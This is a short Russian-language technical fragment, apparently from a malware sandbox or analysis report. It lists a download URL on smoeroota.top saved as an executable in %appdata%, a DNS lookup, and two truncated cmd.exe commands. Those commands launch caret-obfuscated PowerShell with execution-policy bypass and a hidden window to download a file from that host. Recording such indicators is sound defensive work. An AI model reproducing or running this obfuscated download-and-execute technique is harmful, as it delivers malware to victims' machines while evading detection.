Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWEr^sh^eL^L^.eX^E -^eXe^CuT^I^oNPOL^I^cY^ B^ypA^S^s -nO^P^rof^Il^E ^-W^I^nDo^W^St^yLe Hi^D^dEN (New^-oB^jEC^t ^sYsT^EM.ne^T.W^EBcLiE^n^T).doW^nLoaDfIl^E('http://smoeroota.top/re...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^oWEr^sh^eL^L^.eX^E -^eXe^CuT^I^oNPOL^I^cY^ B^ypA^S^s -nO^P^rof^Il^E ^-W^I^nDo^W^St^yLe Hi^D^dEN (New^-oB^jEC^t ^sYsT^EM.ne^T.W^EBcLiE^n^T).doW^nLoaDfIl^E('http://smoeroota.top/re...' (со скрытым окном)